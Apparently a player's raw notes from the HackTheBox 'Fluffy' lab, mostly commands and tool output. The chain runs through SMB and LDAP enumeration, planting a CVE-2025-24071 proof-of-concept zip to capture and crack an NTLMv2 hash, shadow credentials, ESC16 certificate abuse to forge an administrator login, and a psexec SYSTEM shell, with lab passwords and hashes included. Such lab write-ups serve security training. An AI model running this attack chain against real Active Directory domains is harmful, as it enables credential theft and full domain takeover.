FLUFFY-HTB Notes

FLUFFY-HTB

Here is my note on FLUFFY box from Hackthebox.

FLUFFY: 10.129.237.207

As is common in real life Windows pentests, you will start the Fluffy box with credentials for the following account: j.fleischman / J0elTHEM4n1990!

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus

sudo bloodhound-python -u 'j.fleischman' -p 'J0elTHEM4n1990!' -ns 10.129.237.207 -d fluffy.htb -c all 

sudo bloodhound-python -u 'winrm.svc' -p 'J0elTHEM4n1990!' -ns 10.129.237.207 -d fluffy.htb -c all 


BLOODHOUND DATA: 


p.agila -> MemberOf -> Service Account Managers Group -> GenericAll -> Service Accounts Group:

net rpc group addmem "Service Accounts" "p.agila" -U "fluffy.htb"/"p.agila"%"prometheusx-303" -S "10.129.237.207"

net rpc group members "Service Accounts" -U "fluffy.htb"/"p.agila"%"prometheusx-303" -S "10.129.237.207"

p.agila:prometheusx-303 



Service Accounts Group -> GenericWrite -> ldap_svc, winrm_svc and ca_svc users 


python3 /home/kali/Kali-Tools/attacktive-directory-tools/targetedKerberoast/targetedKerberoast.py -v -d 'fluffy.htb' -u 'p.agila' -p 'prometheusx-303' #NOPE

python3 /home/kali/Kali-Tools/attacktive-directory-tools/pywhisker/pywhisker.py -d "fluffy.htb" -u "p.agila" -p 'prometheusx-303' --target "winrm_svc" --action "add"

┌──(root㉿kali)-[/home/kali/BOXES/FLUFFY/10.129.237.207]
└─# python3 /home/kali/Kali-Tools/attacktive-directory-tools/pywhisker/pywhisker.py -d "fluffy.htb" -u "p.agila" -p 'prometheusx-303' --target "winrm_svc" --action "add"

[*] Searching for the target account
[*] Target user found: CN=winrm service,CN=Users,DC=fluffy,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: e58dd69d-78df-ae09-3a79-9e4da52a3e6f
[*] Updating the msDS-KeyCredentialLink attribute of winrm_svc
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[+] Saved PFX (#PKCS12) certificate & key at path: d2PJiAHB.pfx
[*] Must be used with password: Zdssd2loJN16Ce5QOrM4
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools

certipy cert -export -pfx d2PJiAHB.pfx -password "Zdssd2loJN16Ce5QOrM4" -out unprotected_pfx.pfx

certipy auth -pfx unprotected_pfx.pfx -username "winrm_svc" -domain "fluffy.htb"

┌──(root㉿kali)-[/home/kali/BOXES/FLUFFY/10.129.237.207]
└─# faketime -f $(ntpdate -q dc01.fluffy.htb | awk '{print $4}') bash

┌──(root㉿kali)-[/home/kali/BOXES/FLUFFY/10.129.237.207]
└─# certipy auth -pfx unprotected_pfx.pfx -username "winrm_svc" -domain "fluffy.htb"
Certipy v4.7.0 - by Oliver Lyak (ly4k)

[!] Could not find identification in the provided certificate
[*] Using principal: winrm_svc@fluffy.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'winrm_svc.ccache'
[*] Trying to retrieve NT hash for 'winrm_svc'
[*] Got hash for 'winrm_svc@fluffy.htb': aad3b435b51404eeaad3b435b51404ee:33bd09dcd697600edf6b3a7af4875767

python3 /home/kali/Kali-Tools/attacktive-directory-tools/pywhisker/pywhisker.py -d "fluffy.htb" -u "p.agila" -p 'prometheusx-303' --target "ca_svc" --action "add"

┌──(root㉿kali)-[/home/kali/BOXES/FLUFFY/10.129.237.207]
└─# python3 /home/kali/Kali-Tools/attacktive-directory-tools/pywhisker/pywhisker.py -d "fluffy.htb" -u "p.agila" -p 'prometheusx-303' --target "ca_svc" --action "add"

[*] Searching for the target account
[*] Target user found: CN=certificate authority service,CN=Users,DC=fluffy,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: a9849ddd-f03a-9f69-c807-a3d874b2fe88
[*] Updating the msDS-KeyCredentialLink attribute of ca_svc
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[+] Saved PFX (#PKCS12) certificate & key at path: Ugq5IV6S.pfx
[*] Must be used with password: 2zcOSced1xFtRrRnPlgy
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools

certipy cert -export -pfx Ugq5IV6S.pfx -password "2zcOSced1xFtRrRnPlgy" -out ca_svc.pfx

faketime -f $(ntpdate -q dc01.fluffy.htb | awk '{print $4}') bash

certipy auth -pfx ca_svc.pfx -username "ca_svc" -domain "fluffy.htb"

┌──(root㉿kali)-[/home/kali/BOXES/FLUFFY/10.129.237.207]
└─# certipy auth -pfx ca_svc.pfx -username "ca_svc" -domain "fluffy.htb"
Certipy v4.7.0 - by Oliver Lyak (ly4k)

[!] Could not find identification in the provided certificate
[*] Using principal: ca_svc@fluffy.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'ca_svc.ccache'
[*] Trying to retrieve NT hash for 'ca_svc'
[*] Got hash for 'ca_svc@fluffy.htb': aad3b435b51404eeaad3b435b51404ee:ca0f4f9e9eb8a092addf53bb03fc98c8


ESC16 Notes:

Update Certipy to version 5.0.0+ 

certipy find -stdout -u 'ca_svc@fluffy.htb' -hashes :ca0f4f9e9eb8a092addf53bb03fc98c8 -dc-ip 10.129.237.207

certipy find -vulnerable  -stdout -u 'ca_svc@fluffy.htb' -hashes :ca0f4f9e9eb8a092addf53bb03fc98c8 -dc-ip 10.129.237.207

[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : fluffy-DC01-CA
    DNS Name                            : DC01.fluffy.htb
    Certificate Subject                 : CN=fluffy-DC01-CA, DC=fluffy, DC=htb
    Certificate Serial Number           : 3670C4A715B864BB497F7CD72119B6F5
    Certificate Validity Start          : 2025-04-17 16:00:16+00:00
    Certificate Validity End            : 3024-04-17 16:11:16+00:00
    Web Enrollment
      HTTP
        Enabled                         : False
      HTTPS
        Enabled                         : False
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Active Policy                       : CertificateAuthority_MicrosoftDefault.Policy
    Disabled Extensions                 : 1.3.6.1.4.1.311.25.2
    Permissions
      Owner                             : FLUFFY.HTB\Administrators
      Access Rights
        ManageCa                        : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
                                          FLUFFY.HTB\Administrators
        ManageCertificates              : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
                                          FLUFFY.HTB\Administrators
        Enroll                          : FLUFFY.HTB\Cert Publishers
    [!] Vulnerabilities
      ESC16                             : Security Extension is disabled.
    [*] Remarks
      ESC16                             : Other prerequisites may be required for this to be exploitable. See the wiki for more details.
Certificate Templates                   : [!] Could not find any certificate templates


https://medium.com/@muneebnawaz3849/ad-cs-esc16-misconfiguration-and-exploitation-9264e022a8c6

https://github.com/ly4k/Certipy/wiki/06-%E2%80%90-Privilege-Escalation#esc16-security-extension-disabled-on-ca-globally

```

Attacker (attacker@corp.local) has GenericWrite permission over a "victim" account (victim@corp.local). The victim account can enroll in any suitable client authentication template (e.g., the default "User" template) on the ESC16-vulnerable CA. The target for impersonation is administrator@corp.local.

```

certipy account \
    -u 'p.agila@fluffy.htb' -p 'prometheusx-303' \
    -dc-ip '10.129.104.173' -upn 'administrator' \
    -user 'ca_svc' update
	

	
certipy account \
    -u 'p.agila@fluffy.htb' -p 'prometheusx-303' \
    -dc-ip '10.129.104.173' -user 'ca_svc' \
    read
	
	
faketime -f $(ntpdate -q dc01.fluffy.htb | awk '{print $4}') bash 
	
certipy shadow \
    -u 'p.agila@fluffy.htb' -p 'prometheusx-303' \
    -dc-ip '10.129.104.173' -account 'ca_svc' \
    auto
	
┌──(root㉿kali)-[/home/kali/BOXES/FLUFFY/10.129.239.160]
└─# faketime -f $(ntpdate -q dc01.fluffy.htb | awk '{print $4}') bash

┌──(root㉿kali)-[/home/kali/BOXES/FLUFFY/10.129.239.160]
└─# certipy shadow \
    -u 'p.agila@fluffy.htb' -p 'prometheusx-303' \
    -dc-ip '10.129.104.173' -account 'ca_svc' \
    auto
Certipy v4.7.0 - by Oliver Lyak (ly4k)

[*] Targeting user 'ca_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '940711bf-3814-0722-71a2-52f1db4eea54'
[*] Adding Key Credential with device ID '940711bf-3814-0722-71a2-52f1db4eea54' to the Key Credentials for 'ca_svc'
[*] Successfully added Key Credential with device ID '940711bf-3814-0722-71a2-52f1db4eea54' to the Key Credentials for 'ca_svc'
[*] Authenticating as 'ca_svc' with the certificate
[*] Using principal: ca_svc@fluffy.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'ca_svc.ccache'
[*] Trying to retrieve NT hash for 'ca_svc'
[*] Restoring the old Key Credentials for 'ca_svc'
[*] Successfully restored the old Key Credentials for 'ca_svc'
[*] NT hash for 'ca_svc': ca0f4f9e9eb8a092addf53bb03fc98c8

export KRB5CCNAME=ca_svc.ccache

certipy req \
    -k -dc-ip '10.129.104.173' \
    -target 'dc01.fluffy.htb' -ca 'fluffy-DC01-CA' \
    -template 'User'

┌──(root㉿kali)-[/home/kali/BOXES/FLUFFY/10.129.239.160]
└─# certipy req -k -dc-ip '10.129.104.173' -target 'dc01.fluffy.htb' -ca 'fluffy-DC01-CA' -template 'User'
Certipy v4.7.0 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 16
[*] Got certificate with UPN 'administrator'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'


certipy account \
    -u 'p.agila@fluffy.htb' -p 'prometheusx-303' \
    -dc-ip '10.129.104.173' -upn 'ca_svc@fluffy.htb' \
    -user 'ca_svc' update


certipy auth -pfx administrator.pfx -domain fluffy.htb -dc-ip 10.129.104.173

┌──(root㉿kali)-[/home/kali/BOXES/FLUFFY/10.129.239.160]
└─# certipy auth -pfx administrator.pfx -domain fluffy.htb -dc-ip 10.129.104.173
Certipy v4.7.0 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@fluffy.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@fluffy.htb': aad3b435b51404eeaad3b435b51404ee:8da83a3fa618b6e3a00e93f676c92a6e

GOT ADMINISTRATOR HASH !

administrator:8da83a3fa618b6e3a00e93f676c92a6e

┌──(root㉿kali)-[/home/kali/BOXES/FLUFFY/10.129.239.160]
└─# psexec.py -hashes :8da83a3fa618b6e3a00e93f676c92a6e administrator@10.129.104.173
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Requesting shares on 10.129.104.173.....
[*] Found writable share ADMIN$
[*] Uploading file hPrPyfgu.exe
[*] Opening SVCManager on 10.129.104.173.....
[*] Creating service qucU on 10.129.104.173.....
[*] Starting service qucU.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.6893]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32> hostname
DC01


SYSTEM-SHELL ! 

C:\Users\Administrator\Desktop> dir
 Volume in drive C has no label.
 Volume Serial Number is 3DE7-5FBC

 Directory of C:\Users\Administrator\Desktop

05/19/2025  03:31 PM    <DIR>          .
05/19/2025  03:31 PM    <DIR>          ..
06/03/2025  01:50 PM                34 root.txt
               1 File(s)             34 bytes
               2 Dir(s)   6,095,933,440 bytes free

C:\Users\Administrator\Desktop> type root.txt
[REDIRECTED]

ROOT.TXT: [REDIRECTED]

PAST WORK:

certipy account -u 'ca_svc' -hashes ca0f4f9e9eb8a092addf53bb03fc98c8 -target 'fluffy.htb' -upn 'administrator' -user 'ca_svc' update

certipy account -u 'ca_svc' -hashes ca0f4f9e9eb8a092addf53bb03fc98c8 -dc-ip 10.129.237.207 -user 'winrm_svc' read

certipy req -u 'winrm_svc' -hashes 33bd09dcd697600edf6b3a7af4875767 -dc-ip 10.129.44.104 -target 'dc01.fluffy.htb' -ca 'fluffy-DC01-CA' -template 'User'

certipy req \
    -k -dc-ip '10.129.44.104' \
    -target 'dc01.fluffy.htb' -ca 'fluffy-DC01-CA' \
    -template 'User'
	
certipy account -u ca_svc@fluffy.htb -hashes ca0f4f9e9eb8a092addf53bb03fc98c8 -dc-ip 10.129.44.104 -upn administrator -user winrm_svc update

certipy req -u winrm_svc@fluffy.htb -hashes 33bd09dcd697600edf6b3a7af4875767 -dc-ip 10.129.44.104 -target dc01.fluffy.htb -ca fluffy-DC01-CA -template User -upn administrator@fluffy.htb

	

┌──(certipy-venv)─(root㉿kali)-[/home/kali/BOXES/FLUFFY]
└─# certipy account -u 'ca_svc' -hashes ca0f4f9e9eb8a092addf53bb03fc98c8 -target 'fluffy.htb' -upn 'administrator' -user 'winrm_svc' update

Certipy v5.0.2 - by Oliver Lyak (ly4k)

[!] DNS resolution failed: The DNS query name does not exist: fluffy.htb.
[!] Use -debug to print a stacktrace
[*] Updating user 'winrm_svc':
    userPrincipalName                   : administrator
[*] Successfully updated 'winrm_svc'

┌──(certipy-venv)─(root㉿kali)-[/home/kali/BOXES/FLUFFY]
└─# certipy account -u 'ca_svc' -hashes ca0f4f9e9eb8a092addf53bb03fc98c8 -dc-ip 10.129.237.207 -user 'winrm_svc' read

Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Reading attributes for 'winrm_svc':
    cn                                  : winrm service
    distinguishedName                   : CN=winrm service,CN=Users,DC=fluffy,DC=htb
    name                                : winrm service
    objectSid                           : S-1-5-21-497550768-2797716248-2627064577-1603
    sAMAccountName                      : winrm_svc
    servicePrincipalName                : WINRM/winrm.fluffy.htb
    userPrincipalName                   : administrator
    userAccountControl                  : 66048
    whenCreated                         : 2025-04-19T11:51:39+00:00
    whenChanged                         : 2025-05-30T04:03:33+00:00
	
	

DON'T WORK and DON'T BOTHER !: 

python3 pywhisker.py -d "fluffy.htb" -u "winrm.svc" -p "J0elTHEM4n1990!" --target "ca_svc" --action "add"

python3 /home/kali/Kali-Tools/attacktive-directory-tools/pywhisker/pywhisker.py -d "fluffy.htb" -u "winrm.svc" -p 'J0elTHEM4n1990!' --target "ca_svc" --action "add"

python3 targetedKerberoast.py -v -d 'fluffy.htb' -u 'winrm.svc' -p 'J0elTHEM4n1990!'

faketime -f $(ntpdate -q dc01.fluffy.htb | awk '{print $4}') bash 

python3 /home/kali/Kali-Tools/attacktive-directory-tools/targetedKerberoast/targetedKerberoast.py -v -d 'fluffy.htb' -u 'winrm.svc' -p 'J0elTHEM4n1990!'






88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-05-30 01:03:16Z)


┌──(root㉿kali)-[/home/kali/BOXES/FLUFFY/10.129.237.207]
└─# GetUserSPNs.py -request -dc-ip 10.129.237.207 fluffy.htb/j.fleischman:J0elTHEM4n1990!
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

ServicePrincipalName    Name       MemberOf                                       PasswordLastSet             LastLogon                   Delegation
----------------------  ---------  ---------------------------------------------  --------------------------  --------------------------  ----------
ADCS/ca.fluffy.htb      ca_svc     CN=Service Accounts,CN=Users,DC=fluffy,DC=htb  2025-04-17 12:07:50.136701  2025-05-21 18:21:15.969274
LDAP/ldap.fluffy.htb    ldap_svc   CN=Service Accounts,CN=Users,DC=fluffy,DC=htb  2025-04-17 12:17:00.599545  <never>
WINRM/winrm.fluffy.htb  winrm_svc  CN=Service Accounts,CN=Users,DC=fluffy,DC=htb  2025-05-17 20:51:16.786913  2025-05-19 11:13:22.188468

faketime -f $(ntpdate -q dc01.fluffy.htb | awk '{print $4}') bash 

GetUserSPNs.py -request -dc-ip 10.129.237.207 fluffy.htb/j.fleischman:J0elTHEM4n1990! > kerb_hashes.txt 

NOPE - All of the users are uncrackable. 

GetUserSPNs.py -request -dc-ip 10.129.237.207 fluffy.htb/j.fleischman:J0elTHEM4n1990! -request -save -outputfile GetUserSPNS.out

GetNPUsers.py -dc-ip 10.129.237.207 fluffy.htb/ -usersfile users.txt -format hashcat


#NO ASREPROASTING and KERBEROASTING = DON'T BOTHER !



139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: fluffy.htb, Site: Default-First-Site-Name)


ldapsearch -H ldap://10.129.237.207 -x -W -D "j.fleischman@fluffy.htb" -b "dc=fluffy,dc=htb"  '(objectClass=person)' > ldap-people


ldapsearch -H ldap://10.129.237.207 -x -W -D "j.fleischman@fluffy.htb" -b "dc=fluffy,dc=htb" > ldap-output.txt


#NO PASSWORD DISCLOSURE and interesting description fields. 


nxc ldap 10.129.237.207 -u j.fleischamn -p 'J0elTHEM4n1990!' --dns-tcp --dns-server 10.129.237.207 --bloodhound --collection All

┌──(root㉿kali)-[/home/kali/BOXES/FLUFFY/10.129.237.207]
└─# nxc ldap 10.129.237.207 -u winrm.svc -p 'J0elTHEM4n1990!'

LDAP        10.129.237.207  389    10.129.237.207   [-] Error retrieving os arch of 10.129.237.207: Could not connect: timed out
SMB         10.129.237.207  445    DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:fluffy.htb) (signing:True) (SMBv1:False)
LDAP        10.129.237.207  389    DC01             [-] Error in searchRequest -> operationsError: 000004DC: LdapErr: DSID-0C090CB2, comment: In order to perform this operation a successful bind must be completed on the connection., data 0, v4563
LDAP        10.129.237.207  389    DC01             [+] fluffy.htb\winrm.svc:J0elTHEM4n1990!



445/tcp   open  microsoft-ds?

crackmapexec smb 10.129.237.207 -u j.fleischamn -p 'J0elTHEM4n1990!' --shares

┌──(root㉿kali)-[/home/kali/BOXES/FLUFFY/10.129.237.207]
└─# crackmapexec smb 10.129.237.207 -u j.fleischamn -p 'J0elTHEM4n1990!' --shares

SMB         10.129.237.207  445    DC01             [*] Windows 10.0 Build 17763 (name:DC01) (domain:fluffy.htb) (signing:True) (SMBv1:False)
SMB         10.129.237.207  445    DC01             [+] fluffy.htb\j.fleischamn:J0elTHEM4n1990!
SMB         10.129.237.207  445    DC01             [-] Error enumerating shares: STATUS_ACCESS_DENIED


nxc smb 10.129.237.207 -u j.fleischamn -p 'J0elTHEM4n1990!' --shares


┌──(root㉿kali)-[/home/kali/BOXES/FLUFFY/10.129.237.207]
└─# crackmapexec smb 10.129.237.207 -u users.txt -p J0elTHEM4n1990! --continue-on-success
SMB         10.129.237.207  445    DC01             [*] Windows 10.0 Build 17763 (name:DC01) (domain:fluffy.htb) (signing:True) (SMBv1:False)
SMB         10.129.237.207  445    DC01             [+] fluffy.htb\j.fleischman:J0elTHEM4n1990!
SMB         10.129.237.207  445    DC01             [-] fluffy.htb\j.coffey:J0elTHEM4n1990! STATUS_LOGON_FAILURE
SMB         10.129.237.207  445    DC01             [+] fluffy.htb\winrm.svc:J0elTHEM4n1990!
SMB         10.129.237.207  445    DC01             [-] fluffy.htb\p.agila:J0elTHEM4n1990! STATUS_LOGON_FAILURE
SMB         10.129.237.207  445    DC01             [-] fluffy.htb\ldap_svc:J0elTHEM4n1990! STATUS_LOGON_FAILURE
SMB         10.129.237.207  445    DC01             [-] fluffy.htb\ca_svc:J0elTHEM4n1990! STATUS_LOGON_FAILURE
SMB         10.129.237.207  445    DC01             [-] fluffy.htb\krbtgt:J0elTHEM4n1990! STATUS_LOGON_FAILURE
SMB         10.129.237.207  445    DC01             [-] fluffy.htb\administrator:J0elTHEM4n1990! STATUS_LOGON_FAILURE

┌──(root㉿kali)-[/home/kali/BOXES/FLUFFY/10.129.237.207]
└─# cat users.txt
j.fleischman
j.coffey
winrm.svc
p.agila
ldap_svc
ca_svc
krbtgt
administrator 

Got winrm.svc credential ! #NOPE FALSE POSITIVE

winrm.svc:J0elTHEM4n1990!

It's winrm_svc not winrm.svc = FALSE POSITIVE !

┌──(root㉿kali)-[/home/kali/BOXES/FLUFFY/10.129.237.207]
└─# nxc smb 10.129.237.207 -u j.fleischman -p 'J0elTHEM4n1990!' --shares

SMB         10.129.237.207  445    DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:fluffy.htb) (signing:True) (SMBv1:False)
SMB         10.129.237.207  445    DC01             [+] fluffy.htb\j.fleischman:J0elTHEM4n1990!
SMB         10.129.237.207  445    DC01             [*] Enumerated shares
SMB         10.129.237.207  445    DC01             Share           Permissions     Remark
SMB         10.129.237.207  445    DC01             -----           -----------     ------
SMB         10.129.237.207  445    DC01             ADMIN$                          Remote Admin
SMB         10.129.237.207  445    DC01             C$                              Default share
SMB         10.129.237.207  445    DC01             IPC$            READ            Remote IPC
SMB         10.129.237.207  445    DC01             IT              READ,WRITE
SMB         10.129.237.207  445    DC01             NETLOGON        READ            Logon server share
SMB         10.129.237.207  445    DC01             SYSVOL          READ            Logon server share

┌──(root㉿kali)-[/home/kali/BOXES/FLUFFY/10.129.237.207]
└─# nxc smb 10.129.237.207 -u j.fleischman -p 'J0elTHEM4n1990!' --shares

SMB         10.129.237.207  445    DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:fluffy.htb) (signing:True) (SMBv1:False)
SMB         10.129.237.207  445    DC01             [+] fluffy.htb\j.fleischman:J0elTHEM4n1990!
SMB         10.129.237.207  445    DC01             [*] Enumerated shares
SMB         10.129.237.207  445    DC01             Share           Permissions     Remark
SMB         10.129.237.207  445    DC01             -----           -----------     ------
SMB         10.129.237.207  445    DC01             ADMIN$                          Remote Admin
SMB         10.129.237.207  445    DC01             C$                              Default share
SMB         10.129.237.207  445    DC01             IPC$            READ            Remote IPC
SMB         10.129.237.207  445    DC01             IT              READ,WRITE
SMB         10.129.237.207  445    DC01             NETLOGON        READ            Logon server share
SMB         10.129.237.207  445    DC01             SYSVOL          READ            Logon server share

┌──(root㉿kali)-[/home/kali/BOXES/FLUFFY/10.129.237.207]
└─# crackmapexec smb 10.129.237.207 -u j.fleischamn -p 'J0elTHEM4n1990!' --shares

SMB         10.129.237.207  445    DC01             [*] Windows 10.0 Build 17763 (name:DC01) (domain:fluffy.htb) (signing:True) (SMBv1:False)
SMB         10.129.237.207  445    DC01             [+] fluffy.htb\j.fleischamn:J0elTHEM4n1990!
SMB         10.129.237.207  445    DC01             [-] Error enumerating shares: STATUS_ACCESS_DENIED

If crackmapexec don't work then use nxc as a backup !

sudo lookupsid.py j.fleischamn@10.129.237.207 | tee usernames

grep SidTypeUser usernames | awk '{print $2}' | cut -d "\\" -f2 > users.txt

┌──(root㉿kali)-[/home/…/BOXES/FLUFFY/10.129.237.207/IT]
└─# smbclient \\\\10.129.237.207\\IT -U "j.fleischman"
Password for [WORKGROUP\j.fleischman]:
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Thu May 29 22:53:58 2025
  ..                                  D        0  Thu May 29 22:53:58 2025
  Everything-1.4.1.1026.x64           D        0  Fri Apr 18 11:08:44 2025
  Everything-1.4.1.1026.x64.zip       A  1827464  Fri Apr 18 11:04:05 2025
  KeePass-2.58                        D        0  Fri Apr 18 11:08:38 2025
  KeePass-2.58.zip                    A  3225346  Fri Apr 18 11:03:17 2025
  Upgrade_Notice.pdf                  A   169963  Sat May 17 10:31:07 2025

                5842943 blocks of size 4096. 1853329 blocks available
smb: \> mask ""
smb: \> recurse
smb: \> prompt
smb: \> mget *


Upgrade_Notice.pdf:

Recent Vulnerabilities
CVE ID Severity
CVE-2025-24996 Critical
CVE-2025-24071 Critical - I will think about it.
CVE-2025-46785 High - NOPE
CVE-2025-29968 High - NOPE
CVE-2025-21193 Medium - NOPE
CVE-2025-3445 Low - NOPE

CVE-2025-24071 Critical = WORKS ! 

https://cti.monster/blog/2025/03/18/CVE-2025-24071.html

https://github.com/0x6rss/CVE-2025-24071_PoC

┌──(root㉿kali)-[/home/…/BOXES/FLUFFY/10.129.237.207/CVE-2025-24071_PoC]
└─# python3 poc.py
Enter your file name: test
Enter IP (EX: 192.168.1.162): 10.10.14.146
completed

┌──(root㉿kali)-[/home/…/BOXES/FLUFFY/10.129.237.207/CVE-2025-24071_PoC]
└─# ls
exploit.zip  poc.py  README.md

smb: \> put exploit.zip
putting file exploit.zip as \exploit.zip (2.2 kb/s) (average 2.2 kb/s)
smb: \> dir
  .                                   D        0  Thu May 29 23:09:23 2025
  ..                                  D        0  Thu May 29 23:09:23 2025
  Everything-1.4.1.1026.x64           D        0  Fri Apr 18 11:08:44 2025
  Everything-1.4.1.1026.x64.zip       A  1827464  Fri Apr 18 11:04:05 2025
  exploit.zip                         A      316  Thu May 29 23:09:23 2025
  KeePass-2.58                        D        0  Fri Apr 18 11:08:38 2025
  KeePass-2.58.zip                    A  3225346  Fri Apr 18 11:03:17 2025
  Upgrade_Notice.pdf                  A   169963  Sat May 17 10:31:07 2025

                5842943 blocks of size 4096. 1914658 blocks available
				
				
Responder: 

[SMB] NTLMv2-SSP Client   : 10.129.237.207
[SMB] NTLMv2-SSP Username : FLUFFY\p.agila
[SMB] NTLMv2-SSP Hash     : p.agila::FLUFFY:6d9184522b8a6eb5:90C72BE4FC9307C2E20FA9EFA56E3A19:010100000000000000A146F2B3D0DB01067631E67D603D080000000002000
800560046004C004D0001001E00570049004E002D004300550050004B0056004E0033004400310050005A0004003400570049004E002D004300550050004B0056004E0033004400310050005A00
2E00560046004C004D002E004C004F00430041004C0003001400560046004C004D002E004C004F00430041004C0005001400560046004C004D002E004C004F00430041004C000700080000A146F
2B3D0DB010600040002000000080030003000000000000000010000000020000059BB148E3C6418A32E79B118D34F764613C1D0D394F94C40FAC674B7042E1BD40A001000000000000000000000
000000000000000900220063006900660073002F00310030002E00310030002E00310034002E003100340036000000000000000000


p.agila::FLUFFY:6d9184522b8a6eb5:90C72BE4FC9307C2E20FA9EFA56E3A19:010100000000000000A146F2B3D0DB01067631E67D603D080000000002000800560046004C004D0001001E00570049004E002D004300550050004B0056004E0033004400310050005A0004003400570049004E002D004300550050004B0056004E0033004400310050005A002E00560046004C004D002E004C004F00430041004C0003001400560046004C004D002E004C004F00430041004C0005001400560046004C004D002E004C004F00430041004C000700080000A146F2B3D0DB010600040002000000080030003000000000000000010000000020000059BB148E3C6418A32E79B118D34F764613C1D0D394F94C40FAC674B7042E1BD40A001000000000000000000000000000000000000900220063006900660073002F00310030002E00310030002E00310034002E003100340036000000000000000000

┌──(root㉿kali)-[/home/kali/BOXES/FLUFFY/10.129.237.207]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt  p.agila_hashes
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
prometheusx-303  (p.agila)
1g 0:00:00:05 DONE (2025-05-29 16:12) 0.1808g/s 816977p/s 816977c/s 816977C/s proquis..programmercomputer
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.

p.agila:prometheusx-303 

p.agila credential discovered ! 



464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-server-header: Microsoft-HTTPAPI/2.0


┌──(root㉿kali)-[/home/kali/BOXES/FLUFFY/10.129.237.207]
└─# crackmapexec winrm 10.129.237.207 -u j.fleischamn -p 'J0elTHEM4n1990!'
SMB         10.129.237.207  5985   DC01             [*] Windows 10.0 Build 17763 (name:DC01) (domain:fluffy.htb)
HTTP        10.129.237.207  5985   DC01             [*] http://10.129.237.207:5985/wsman
WINRM       10.129.237.207  5985   DC01             [-] fluffy.htb\j.fleischamn:J0elTHEM4n1990!


┌──(root㉿kali)-[/home/kali/BOXES/FLUFFY/10.129.237.207]
└─# nxc winrm 10.129.237.207 -u winrm_svc -H '33bd09dcd697600edf6b3a7af4875767'
WINRM       10.129.237.207  5985   DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:fluffy.htb)
WINRM       10.129.237.207  5985   DC01             [+] fluffy.htb\winrm_svc:33bd09dcd697600edf6b3a7af4875767 (Pwn3d!)


┌──(root㉿kali)-[/home/kali/BOXES/FLUFFY]
└─# evil-winrm -i 10.129.237.207 -u winrm_svc -H 33bd09dcd697600edf6b3a7af4875767

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\winrm_svc\Documents> whoami
fluffy\winrm_svc
*Evil-WinRM* PS C:\Users\winrm_svc\Documents> hostname
DC01


USER-SHELL ! 

*Evil-WinRM* PS C:\Users\winrm_svc\Desktop> whoami
fluffy\winrm_svc
*Evil-WinRM* PS C:\Users\winrm_svc\Desktop> hostname
DC01
*Evil-WinRM* PS C:\Users\winrm_svc\Desktop> dir


    Directory: C:\Users\winrm_svc\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        5/29/2025   5:51 PM             34 user.txt


*Evil-WinRM* PS C:\Users\winrm_svc\Desktop> type user.txt
[REDIRECTED]

USER.TXT: [REDIRECTED]


PRIV ESC: 

Shadow Credential to ca_svc for Certificate enumeration. 

